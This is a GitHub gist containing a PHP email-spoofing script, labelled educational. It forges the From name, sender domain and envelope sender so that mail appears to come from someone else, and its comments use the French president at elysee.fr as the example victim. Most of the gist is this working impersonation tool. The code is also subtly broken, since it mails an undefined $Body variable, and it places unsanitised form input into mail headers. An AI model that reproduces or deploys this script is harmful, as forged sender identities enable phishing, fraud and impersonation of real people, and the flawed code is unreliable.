-
-
Save Random1984/5cf17aab32855cfd63a4f976fe511d70 to your computer and use it in GitHub Desktop.
Email Spoofing Example (Educational Purposes only)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
/* | |
Email Spoofing script (PHP). For Educational Purposes only. | |
To note that capabilities of the script have been intentionally limited. | |
This work is licensed under a MIT License. Copyright 2012 Florian Bersier | |
*/ | |
// Get posted data into local variables | |
$EmailFrom = Trim(stripslashes($_POST['EmailFrom'])); // Your email, e.g. [email protected] | |
$EmailTo = Trim(stripslashes($_POST['EmailTo'])); // Recipient, e.g. email of your friend | |
$FakeEmail = Trim(stripslashes($_POST['FakeEmail'])); // Fake email, e.g. [email protected] | |
$FakeDomain = Trim(stripslashes($_POST['domain'])); // Fake Domain, e.g. elysee.fr | |
$Name = Trim(stripslashes($_POST['Name'])); // Your name | |
$FakeName = Trim(stripslashes($_POST['FakeName'])); // Your fake name, e.g. Nicolas Sarkozy | |
$Subject = Trim(stripslashes($_POST['Subject'])); // Subject of the email | |
$Message = nl2br(Trim(stripslashes($_POST['Message']))); // Body of the email | |
// Modify headers of the Email | |
$FakeSender = "X-Sender: $FakeDomain"; | |
$FakeReturn = "Return-Path: $EmailFrom"; | |
$Fake = "From: $FakeName "; | |
$Reply = "Reply-To: $EmailFrom"; | |
$BCC = "Bcc: $EmailFrom"; | |
$additional = "-f $FakeEmail"; // Hide the Mailed-by or Via | |
$headers = 'MIME-Version: 1.0' . "\r\n"; | |
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; | |
$headers .= $FakeSender. "\r\n"; | |
$headers .= "X-Priority: 3\r\n"; // Normal priority (3), urgent is often categorized as Spam | |
$headers .= $Fake . "\r\n"; | |
$headers .= $Reply . "\r\n"; | |
$headers .= $BCC . "\r\n"; | |
$headers .= $FakeReturn . "\r\n"; | |
// Finally, Send Email | |
mail($EmailTo, $Subject, $Body, $headers, $additional); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment